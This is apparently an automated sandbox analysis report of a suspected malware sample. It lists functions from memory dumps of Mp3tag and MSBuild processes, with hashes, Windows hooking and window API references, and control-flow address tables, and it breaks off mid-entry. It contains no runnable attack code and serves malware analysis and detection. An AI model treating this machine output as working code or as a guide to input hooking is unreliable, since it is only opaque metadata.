                                                                                                            • Source File: 00000009.00000002.1502984786.00000000004D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004D0000, based on PE: true
                                                                                                            • Associated: 00000009.00000002.1502968082.00000000004D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1502984786.00000000004E4000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1502984786.000000000050C000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1503040659.000000000050F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1503040659.000000000051B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1503066999.0000000000521000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1503079256.0000000000523000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1503079256.0000000000525000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_4d0000_Mp3tag.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ExceptionRaise
                                                                                                            • String ID: H
                                                                                                            • API String ID: 3997070919-2852464175
                                                                                                            • Opcode ID: eb5f00e2425578da8bc166ff20cdd415e129435e052d450994fa6166bcee0d28
                                                                                                            • Instruction ID: eb28c45e1a2323ab375259887d61f891adf40b01b2791069f550b84b921f2da4
                                                                                                            • Opcode Fuzzy Hash: eb5f00e2425578da8bc166ff20cdd415e129435e052d450994fa6166bcee0d28
                                                                                                            • Instruction Fuzzy Hash: B0D1C332608B8486D771DB16F4A439BB7A1F788784F50452BEA8D47B68DF7CC584CB44
                                                                                                            Function 004DB9E0 Relevance: 6.1, APIs: 4, Instructions: 104threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetThreadUILanguage.KERNEL32 ref: 004DB9F9
                                                                                                            • SetThreadPreferredUILanguages.KERNEL32 ref: 004DBA70
                                                                                                            • SetThreadPreferredUILanguages.KERNEL32 ref: 004DBADF
                                                                                                            • SetThreadPreferredUILanguages.KERNEL32 ref: 004DBB1F
                                                                                                              • Part of subcall function 004DB980: GetThreadPreferredUILanguages.KERNEL32(?,?,?,00000000,?,004DBA82), ref: 004DB9A6
                                                                                                              • Part of subcall function 004DB980: GetThreadPreferredUILanguages.KERNEL32(?,?,?,00000000,?,004DBA82), ref: 004DB9CF
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.1502984786.00000000004D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004D0000, based on PE: true
                                                                                                            • Associated: 00000009.00000002.1502968082.00000000004D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1502984786.00000000004E4000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1502984786.000000000050C000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1503040659.000000000050F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1503040659.000000000051B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1503066999.0000000000521000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1503079256.0000000000523000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1503079256.0000000000525000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_4d0000_Mp3tag.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Thread$LanguagesPreferred$Language
                                                                                                            • String ID:
                                                                                                            • API String ID: 2255706666-0
                                                                                                            • Opcode ID: 7eb7265aa95f4db2697b8073204b93a7ee35513f7c08303352e1d2dd9f9e582e
                                                                                                            • Instruction ID: 90c3dc1f3ab78f3af3a0d8c3a89e2d0aa6a200797131a63b2e6f60cc24a0ba30
                                                                                                            • Opcode Fuzzy Hash: 7eb7265aa95f4db2697b8073204b93a7ee35513f7c08303352e1d2dd9f9e582e
                                                                                                            • Instruction Fuzzy Hash: 4C31A072201660CADB54DF32CA613EA2761EB44BDDF45612BFB0A47B58DB78CC85C784

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:13.5%
                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                            Signature Coverage:0%
                                                                                                            Total number of Nodes:109
                                                                                                            Total number of Limit Nodes:14
                                                                                                            execution_graph 55863 c0d580 55864 c0d598 55863->55864 55865 c0d5f2 55864->55865 55871 72c14b8 55864->55871 55875 72c1090 55864->55875 55879 72c1517 55864->55879 55884 72c2e5b 55864->55884 55888 72c14c8 55864->55888 55872 72c14c8 55871->55872 55873 72c1090 CallWindowProcW 55872->55873 55874 72c150f 55873->55874 55874->55865 55876 72c109b 55875->55876 55878 72c2eb9 55876->55878 55892 72c12e4 CallWindowProcW 55876->55892 55880 72c14c5 55879->55880 55881 72c1526 55879->55881 55882 72c1090 CallWindowProcW 55880->55882 55881->55865 55883 72c150f 55882->55883 55883->55865 55885 72c2e95 55884->55885 55887 72c2eb9 55885->55887 55893 72c12e4 CallWindowProcW 55885->55893 55889 72c14ee 55888->55889 55890 72c1090 CallWindowProcW 55889->55890 55891 72c150f 55890->55891 55891->55865 55892->55878 55893->55887 55900 6b138c0 55901 6b138d7 55900->55901 55908 6b13940 55901->55908 55913 6b13a49 55901->55913 55902 6b138f5 55919 6b15781 55902->55919 55925 6b15790 55902->55925 55909 6b13974 55908->55909 55910 6b13a38 55909->55910 55930 6b14230 55909->55930 55934 6b14228 55909->55934 55910->55902 55914 6b13a5f 55913->55914 55915 6b139c3 55913->55915 55916 6b13a38 55915->55916 55917 6b14230 SetWindowsHookExW 55915->55917 55918 6b14228 SetWindowsHookExW 55915->55918 55916->55902 55917->55915 55918->55915 55920 6b15716 55919->55920 55921 6b1578e 55919->55921 55938 6b15c48 55921->55938 55942 6b15c3a 55921->55942 55926 6b1579f 55925->55926 55928 6b15c48 4 API calls 55926->55928 55929 6b15c3a 4 API calls 55926->55929 55927 6b13937 55928->55927 55929->55927 55931 6b14274 SetWindowsHookExW 55930->55931 55933 6b142ba 55931->55933 55933->55909 55937 6b14230 SetWindowsHookExW 55934->55937 55936 6b142ba 55936->55909 55937->55936 55939 6b15c76 55938->55939 55946 6b15840 55939->55946 55941 6b15c96 55944 6b15c76 55942->55944 55943 6b15840 4 API calls 55945 6b15c96 55943->55945 55944->55943 55945->55945 55947 6b1584b 55946->55947 55948 6b163bc 55947->55948 55949 6b16417 55947->55949 55953 6b17c28 55947->55953 55948->55949 55958 72cb980 55948->55958 55962 72cb97e 55948->55962 55949->55941 55954 6b17c49 55953->55954 55955 6b17c6d 55954->55955 55966 6b17dc9 55954->55966 55970 6b17dd8 55954->55970 55955->55948 55960 72cb9e5 55958->55960 55959 72cbe48 WaitMessage 55959->55960 55960->55959 55961 72cba32 55960->55961 55961->55949 55963 72cb980 55962->55963 55964 72cbe48 WaitMessage 55963->55964 55965 72cba32 55963->55965 55964->55963 55965->55949 55967 6b17dd8 55966->55967 55968 6b17e1e 55967->55968 55974 6b16054 55967->55974 55968->55955 55971 6b17de5 55970->55971 55972 6b17e1e 55971->55972 55973 6b16054 2 API calls 55971->55973 55972->55955 55973->55972 55975 6b1605f 55974->55975 55977 6b17e90 55975->55977 55978 6b16088 55975->55978 55977->55977 55979 6b16093 55978->55979 55984 6b16098 55979->55984 55981 6b17eff 55988 66efce4 55981->55988 55985 6b160a3 55984->55985 55986 6b18f28 55985->55986 55987 6b17c28 2 API calls 55985->55987 55986->55981 55987->55986 55989 66efcf5 55988->55989 55990 66efcfd 55988->55990 55989->55977 55993 669f2b0 55990->55993 55994 669f2d2 55993->55994 55995 669f336 55993->55995 55994->55995 55998 72c07f8 55994->55998 56002 72c0808 55994->56002 56000 72c09bd CreateWindowExW 55998->56000 56001 72c09c8 CreateWindowExW 55998->56001 55999 72c083d 55999->55995 56000->55999 56001->55999 56003 72c083d 56002->56003 56004 72c09bd CreateWindowExW 56002->56004 56005 72c09c8 CreateWindowExW 56002->56005 56003->55995 56004->56003 56005->56003 55894 72c70c0 55895 72c71dc 55894->55895 55896 72c7132 55894->55896 55897 72c1090 CallWindowProcW 55895->55897 55898 72c718a CallWindowProcW 55896->55898 55899 72c7139 55896->55899 55897->55899 55898->55899

                                                                                                            Executed Functions

                                                                                                            Function 07415268 Relevance: 25.5, Strings: 19, Instructions: 1768COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2535967631.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_7410000_MSBuild.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: "$4'q$LRq$Plq$[$[$\$]$]$g$u${${$}$}$$q$$q$cq$cq
                                                                                                            • API String ID: 0-511269315
                                                                                                            • Opcode ID: d02b9775eb3737222f4bd00e6613a902727ee9227be7d51669744d22676fb327
                                                                                                            • Instruction ID: 7422384e34f4780616407475e259ff662c9955619f252940bcc668bae08019ac
                                                                                                            • Opcode Fuzzy Hash: d02b9775eb3737222f4bd00e6613a902727ee9227be7d51669744d22676fb327
                                                                                                            • Instruction Fuzzy Hash: 5013A3B4E012298FDB64DF68C984B9DBBB6BF49300F1481EAD549A7355DB309E81CF44
                                                                                                            Function 022B15E0 Relevance: 9.2, Strings: 6, Instructions: 1717COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2525217580.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_22b0000_MSBuild.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: *JL6$:hW`$@^#$I0=$S3.$WG#`
                                                                                                            • API String ID: 0-3669199882
                                                                                                            • Opcode ID: ccbd32d95bc10efe175eb7f29da17771733553af13fdb96f20b1c2c0d3ffdd6b
                                                                                                            • Instruction ID: b86505a2abab1e30a9d4d918cf8584845ab84f0477131a6e2a0f7443c917fd96
                                                                                                            • Opcode Fuzzy Hash: ccbd32d95bc10efe175eb7f29da17771733553af13fdb96f20b1c2c0d3ffdd6b
                                                                                                            • Instruction Fuzzy Hash: C703F774A1121ACFDB55CFA8C880AD9B7F5FF49344F1486A6D819EB319E770AA81CF40
                                                                                                            Function 06694D68 Relevance: 6.8, Strings: 5, Instructions: 513COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1291 6694d68-6694d88 1292 6694d8a 1291->1292 1293 6694d8f-6694e4b 1291->1293 1292->1293 1298 6694e4d 1293->1298 1299 6694e52-6694e94 1293->1299 1298->1299 1302 6694e9b-6694ed3 1299->1302 1303 6694e96 1299->1303 1305 6694eda-6694f02 1302->1305 1306 6694ed5 1302->1306 1303->1302 1308 669556e-669557a 1305->1308 1306->1305 1309 6695580-669558b 1308->1309 1310 6694f07-6694f13 1308->1310 1313 669558d-669558e 1309->1313 1314 6695593-66955b1 1309->1314 1311 6694f1a-6694f34 1310->1311 1312 6694f15 1310->1312 1315 6694f3b-6694f75 1311->1315 1316 6694f36 1311->1316 1312->1311 1313->1310 1318 66955c0 1314->1318 1319 66955b3-66955bf 1314->1319 1322 6694fa2-6694fe1 1315->1322 1323 6694f77-6694f96 1315->1323 1316->1315 1319->1318 1338 6694fe8-6695021 1322->1338 1339 6694fe3 1322->1339 1324 6694f9c-6694f9d 1323->1324 1325 6695295-66952a7 1323->1325 1326 6695050-6695057 1324->1326 1328 66952a9 1325->1328 1329 66952ae-66952e4 1325->1329 1330 6695059-6695065 1326->1330 1331 6695081 1326->1331 1328->1329 1340 66952eb-6695333 1329->1340 1341 66952e6 1329->1341 1332 669506f-6695075 1330->1332 1333 6695067-669506d 1330->1333 1336 6695087-66950a1 1331->1336 1337 669507f 1332->1337 1333->1337 1342 66950b1-66950f0 1336->1342 1343 66950a3-66950ac 1336->1343 1337->1336 1367 6695028-6695035 1338->1367 1368 6695023 1338->1368 1339->1338 1350 6695339-669535b 1340->1350 1351 6695501-669551c 1340->1351 1341->1340 1364 66950f2 1342->1364 1365 66950f7-6695130 1342->1365 1344 6695180-6695187 1343->1344 1345 6695189-6695195 1344->1345 1346 66951b1 1344->1346 1352 669519f-66951a5 1345->1352 1353 6695197-669519d 1345->1353 1354 66951b7-66951ce 1346->1354 1355 669535d 1350->1355 1356 6695362-66953f3 1350->1356 1358 669551e-669553c 1351->1358 1359 6695500 1351->1359 1360 66951af 1352->1360 1353->1360 1361 66951d0 1354->1361 1362 66951d5-669520e 1354->1362 1355->1356 1380 66953fa-669545e 1356->1380 1381 66953f5 1356->1381 1369 669554b 1358->1369 1370 669553e-669554a 1358->1370 1359->1351 1360->1354 1361->1362 1362->1322 1375 6695214-6695221 1362->1375 1364->1365 1383 6695132 1365->1383 1384 6695137-6695144 1365->1384 1373 669503e-669504a 1367->1373 1368->1367 1369->1308 1370->1369 1373->1326 1375->1322 1378 6695227-669522c 1375->1378 1378->1351 1382 6695232-6695246 1378->1382 1394 6695460 1380->1394 1395 6695465-66954a7 1380->1395 1381->1380 1382->1322 1385 669524c-669525e 1382->1385 1383->1384 1389 669514d-6695179 1384->1389 1386 6695260 1385->1386 1387 6695265-669528f 1385->1387 1386->1387 1387->1325 1387->1359 1389->1323 1391 669517f 1389->1391 1391->1344 1394->1395 1398 66954a9 1395->1398 1399 66954ae-66954fd 1395->1399 1398->1399 1399->1351 1402 66954ff 1399->1402 1402->1359
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2534373193.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_6690000_MSBuild.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Fv$$q$$q$$q$$q
                                                                                                            • API String ID: 0-3007428576
                                                                                                            • Opcode ID: 0829daf8b97bc8a1be8f18b669d37fceae0ae23a5b80cd056c5c81034078e574
                                                                                                            • Instruction ID: f3a29d0c5d8b622adf2f1dc50a1619d30a0da325e67b8a524fd5f4b8a3a76045
                                                                                                            • Opcode Fuzzy Hash: 0829daf8b97bc8a1be8f18b669d37fceae0ae23a5b80cd056c5c81034078e574
                                                                                                            • Instruction Fuzzy Hash: DB32D374E002198FDB64DF69C980B9DBBB6BF88300F1481A5D40AAB355DB34AE85CF64
                                                                                                            Function 022BD110 Relevance: 6.7, Strings: 4, Instructions: 1683COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2525217580.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_22b0000_MSBuild.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 7.LL$M2*r$^<oN$^L,j
                                                                                                            • API String ID: 0-4087586809
                                                                                                            • Opcode ID: 9131f2fca03e379aa147249d46726c8e9a6905b7f5abafe6e6ca1559328e49a5
                                                                                                            • Instruction ID: 11b37c616cf2f500b6743577b65318df4d978d6df6d69b169d855b74a97940b7
                                                                                                            • Opcode Fuzzy Hash: 9131f2fca03e379aa147249d46726c8e9a6905b7f5abafe6e6ca1559328e49a5
                                                                                                            • Instruction Fuzzy Hash: DA03AF74E1122A8FCB61CF68C984AD9BBF5BF49304F1585A6D819EB315E770AE81CF40
                                                                                                            Function 022B15C3 Relevance: 6.2, Strings: 4, Instructions: 1250COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2525217580.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_22b0000_MSBuild.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: *JL6$:hW`$@^#$S3.
                                                                                                            • API String ID: 0-1394080836
                                                                                                            • Opcode ID: 04ad928902eca3497ccd9bae10d34f83b9a6dad848154dd6123653cfbcc503ae
                                                                                                            • Instruction ID: cad1c1e7bc0c37929be8f561a0165712de7c3a5a96b9c06ab35d2b2d3efd9b61
                                                                                                            • Opcode Fuzzy Hash: 04ad928902eca3497ccd9bae10d34f83b9a6dad848154dd6123653cfbcc503ae
                                                                                                            • Instruction Fuzzy Hash: E5D2B574A0121A8FDB55CFA8D884ADEB7F5FF49304F1486A6D818EB359E770AA41CF40
                                                                                                            Function 06695C18 Relevance: 5.9, Strings: 4, Instructions: 856COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 2135 6695c18-6695c38 2136 6695c3a 2135->2136 2137 6695c3f-6695cf8 2135->2137 2136->2137 2144 6695cfa 2137->2144 2145 6695cff-6695d75 2137->2145 2144->2145 2149 6695d7c-6695dc6 2145->2149 2150 6695d77 2145->2150 2153 6695dc8 2149->2153 2154 6695dcd-6695dee 2149->2154 2150->2149 2153->2154 2155 6695df0 2154->2155 2156 6695df5-6695e1a 2154->2156 2155->2156 2158 669644e-6696457 2156->2158 2159 669645d-6696493 2158->2159 2160 6695e1f-6695e28 2158->2160 2169 669649a-669652c 2159->2169 2170 6696495 2159->2170 2161 6695e2a 2160->2161 2162 6695e2f-6695e4f 2160->2162 2161->2162 2162->2160 2163 6695e51 2162->2163 2165 6695e52-6695e65 2163->2165 2165->2165 2166 6695e67-6695e81 2165->2166 2166->2165 2168 6695e83-6695eb7 2166->2168 2175 6695eb9 2168->2175 2176 6695ebe-6695f1c 2168->2176 2178 669652e 2169->2178 2179 6696533-6696583 2169->2179 2170->2169 2175->2176 2190 6695f1e 2176->2190 2191 6695f23-6695f65 2176->2191 2178->2179 2185 669658a-66965ab 2179->2185 2186 6696585 2179->2186 2188 66965ad 2185->2188 2189 66965b2-66965dd 2185->2189 2186->2185 2188->2189 2193 6696bdf-6696be8 2189->2193 2190->2191 2204 6695f6c-6695fd5 2191->2204 2205 6695f67 2191->2205 2195 6696bee-6696c04 2193->2195 2196 66965e2-66965eb 2193->2196 2199 6696c0c-6696c3a 2195->2199 2200 6696c06-6696c07 2195->2200 2197 66965ed 2196->2197 2198 66965f2-669661c 2196->2198 2197->2198 2198->2159 2203 6696622 2198->2203 2200->2196 2206 6696623-669664d 2203->2206 2213 6695fdd-6695fef 2204->2213 2214 6695fd7-6695fd8 2204->2214 2205->2204 2206->2206 2208 669664f-669665d 2206->2208 2208->2206 2209 669665f-6696696 2208->2209 2218 6696698 2209->2218 2219 669669d-6696704 2209->2219 2216 6695ff1 2213->2216 2217 6695ff6-6696000 2213->2217 2214->2165 2216->2217 2221 669600c-6696031 2217->2221 2218->2219 2232 669670b-669674d 2219->2232 2233 6696706 2219->2233 2222 6696038-6696061 2221->2222 2223 6696033 2221->2223 2226 66962e3-66962fd 2222->2226 2223->2222 2230 6696303-6696320 2226->2230 2231 6696066-6696077 2226->2231 2237 669632f 2230->2237 2238 6696322-669632e 2230->2238 2234 6696079 2231->2234 2235 669607e-66960f0 2231->2235 2244 669674f 2232->2244 2245 6696754-66967cb 2232->2245 2233->2232 2234->2235 2248 66960f2 2235->2248 2249 66960f7-6696139 2235->2249 2237->2158 2238->2237 2244->2245 2254 66967cd-66967ce 2245->2254 2255 66967d3-66967e5 2245->2255 2248->2249 2256 669613b 2249->2256 2257 6696140-6696169 2249->2257 2254->2206 2258 66967ec-6696827 2255->2258 2259 66967e7 2255->2259 2256->2257 2262 669616b-6696183 2257->2262 2263 6696185 2257->2263 2264 6696829 2258->2264 2265 669682e-6696857 2258->2265 2259->2258 2266 669618b-66961b2 2262->2266 2263->2266 2264->2265 2269 6696afe-6696b18 2265->2269 2270 66961b8-6696203 2266->2270 2271 66962ac-66962c9 2266->2271 2275 669685c-669686d 2269->2275 2276 6696b1e-6696b3b 2269->2276 2284 669620a-669624c 2270->2284 2285 6696205 2270->2285 2271->2270 2272 66962cf-66962e2 2271->2272 2272->2226 2278 669686f 2275->2278 2279 6696874-669687e 2275->2279 2282 6696b4a 2276->2282 2283 6696b3d-6696b49 2276->2283 2278->2279 2286 669688a-6696899 2279->2286 2282->2193 2283->2282 2292 669624e 2284->2292 2293 6696253-669627c 2284->2293 2285->2284 2287 669689a-66968e6 2286->2287 2295 66968e8 2287->2295 2296 66968ed-669692f 2287->2296 2292->2293 2298 6696298 2293->2298 2299 669627e-6696296 2293->2299 2295->2296 2304 6696931 2296->2304 2305 6696936-669695f 2296->2305 2301 669629e-66962ab 2298->2301 2299->2301 2301->2271 2304->2305 2307 669697b 2305->2307 2308 6696961-6696979 2305->2308 2309 6696981-66969b0 2307->2309 2308->2309 2311 6696aea-6696afd 2309->2311 2312 66969b6-66969cc 2309->2312 2311->2269 2314 66969ce-66969e5 2312->2314 2315 66969f6-6696a41 2312->2315 2314->2287 2316 66969eb-66969f0 2314->2316 2319 6696a48-6696a8a 2315->2319 2320 6696a43 2315->2320 2316->2311 2316->2315 2323 6696a8c 2319->2323 2324 6696a91-6696aba 2319->2324 2320->2319 2323->2324 2326 6696abc-6696ad4 2324->2326 2327 6696ad6 2324->2327 2328 6696adc-6696ae9 2326->2328 2327->2328 2328->2311
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2534373193.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_6690000_MSBuild.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $q$$q$$q$$q
                                                                                                            • API String ID: 0-4102054182
                                                                                                            • Opcode ID: af596fb25b6b6e7c5aaecd3d9d5e0fdeb477a06cf96f8145f2a4430cc23284d9
                                                                                                            • Instruction ID: 65160433d61064b781e76ced7a661adf980d6ef1b38dddd60bceec3017fcf736
                                                                                                            • Opcode Fuzzy Hash: af596fb25b6b6e7c5aaecd3d9d5e0fdeb477a06cf96f8145f2a4430cc23284d9
                                                                                                            • Instruction Fuzzy Hash: B392B474E002298FEB64DF68C985B9DBBB6BF89300F1481A5D409EB355DB34AE81CF54
                                                                                                            Function 022BD0F3 Relevance: 5.0, Strings: 3, Instructions: 1225COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2525217580.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_22b0000_MSBuild.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 7.LL$M2*r$^<oN
                                                                                                            • API String ID: 0-2101644819
                                                                                                            • Opcode ID: fe9e999c83d2dacb2ab85c5b74426d5820dc9083737a7627cc5e87449b217fec
                                                                                                            • Instruction ID: 00c39e8a6968aae9940a5e7382e3a1cae9105c661929dcfba2983174b3f4f591
                                                                                                            • Opcode Fuzzy Hash: fe9e999c83d2dacb2ab85c5b74426d5820dc9083737a7627cc5e87449b217fec
                                                                                                            • Instruction Fuzzy Hash: C9D2A174E0122A8FCB55CF68C984ADEBBF5BF49304F1585AAD418EB355E770AA81CF40
                                                                                                            Function 06694D58 Relevance: 4.2, Strings: 3, Instructions: 415COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 2930 6694d58-6694d5c 2931 6694d8c-6694d8e 2930->2931 2932 6694d5e-6694d88 2930->2932 2934 6694d8f-6694e4b 2931->2934 2932->2934 2937 6694d8a 2932->2937 2941 6694e4d 2934->2941 2942 6694e52-6694e94 2934->2942 2937->2934 2941->2942 2945 6694e9b-6694ed3 2942->2945 2946 6694e96 2942->2946 2948 6694eda-6694f02 2945->2948 2949 6694ed5 2945->2949 2946->2945 2951 669556e-669557a 2948->2951 2949->2948 2952 6695580-669558b 2951->2952 2953 6694f07-6694f13 2951->2953 2956 669558d-669558e 2952->2956 2957 6695593-66955b1 2952->2957 2954 6694f1a-6694f34 2953->2954 2955 6694f15 2953->2955 2958 6694f3b-6694f75 2954->2958 2959 6694f36 2954->2959 2955->2954 2956->2953 2961 66955c0 2957->2961 2962 66955b3-66955bf 2957->2962 2965 6694fa2-6694fe1 2958->2965 2966 6694f77-6694f96 2958->2966 2959->2958 2962->2961 2981 6694fe8-6695021 2965->2981 2982 6694fe3 2965->2982 2967 6694f9c-6694f9d 2966->2967 2968 6695295-66952a7 2966->2968 2969 6695050-6695057 2967->2969 2971 66952a9 2968->2971 2972 66952ae-66952e4 2968->2972 2973 6695059-6695065 2969->2973 2974 6695081 2969->2974 2971->2972 2983 66952eb-6695333 2972->2983 2984 66952e6 2972->2984 2975 669506f-6695075 2973->2975 2976 6695067-669506d 2973->2976 2979 6695087-66950a1 2974->2979 2980 669507f 2975->2980 2976->2980 2985 66950b1-66950f0 2979->2985 2986 66950a3-66950ac 2979->2986 2980->2979 3010 6695028-6695035 2981->3010 3011 6695023 2981->3011 2982->2981 2993 6695339-669535b 2983->2993 2994 6695501-669551c 2983->2994 2984->2983 3007 66950f2 2985->3007 3008 66950f7-6695130 2985->3008 2987 6695180-6695187 2986->2987 2988 6695189-6695195 2987->2988 2989 66951b1 2987->2989 2995 669519f-66951a5 2988->2995 2996 6695197-669519d 2988->2996 2997 66951b7-66951ce 2989->2997 2998 669535d 2993->2998 2999 6695362-66953f3 2993->2999 3001 669551e-669553c 2994->3001 3002 6695500 2994->3002 3003 66951af 2995->3003 2996->3003 3004 66951d0 2997->3004 3005 66951d5-669520e 2997->3005 2998->2999 3023 66953fa-669545e 2999->3023 3024 66953f5 2999->3024 3012 669554b 3001->3012 3013 669553e-669554a 3001->3013 3002->2994 3003->2997 3004->3005 3005->2965 3018 6695214-6695221 3005->3018 3007->3008 3026 6695132 3008->3026 3027 6695137-6695144 3008->3027 3016 669503e-669504a 3010->3016 3011->3010 3012->2951 3013->3012 3016->2969 3018->2965 3021 6695227-669522c 3018->3021 3021->2994 3025 6695232-6695246 3021->3025 3037 6695460 3023->3037 3038 6695465-66954a7 3023->3038 3024->3023 3025->2965 3028 669524c-669525e 3025->3028 3026->3027 3032 669514d-6695179 3027->3032 3029 6695260 3028->3029 3030 6695265-669528f 3028->3030 3029->3030 3030->2968 3030->3002 3032->2966 3034 669517f 3032->3034 3034->2987 3037->3038 3041 66954a9 3038->3041 3042 66954ae-66954fd 3038->3042 3041->3042 3042->2994 3045 66954ff 3042->3045 3045->3002
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2534373193.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_6690000_MSBuild.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Fv$$q$$q
                                                                                                            • API String ID: 0-240997544
                                                                                                            • Opcode ID: 64d0747fe6e109b8c63061817c3a2f6db748bc89629e58af888d6980c71bec89
                                                                                                            • Instruction ID: 7bc2c163d8f53527cd45a62bea438798a4d8f7e5f93466e1bf0c9bd6a3101d57
                                                                                                            • Opcode Fuzzy Hash: 64d0747fe6e109b8c63061817c3a2f6db748bc89629e58af888d6980c71bec89
                                                                                                            • Instruction Fuzzy Hash: 8012D474E012188FDB64DF69C980B9DBBF6BF88300F1481A5D809EB355DB34AA85CF65
                                                                                                            Function 022B1070 Relevance: 4.1, Strings: 3, Instructions: 353COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
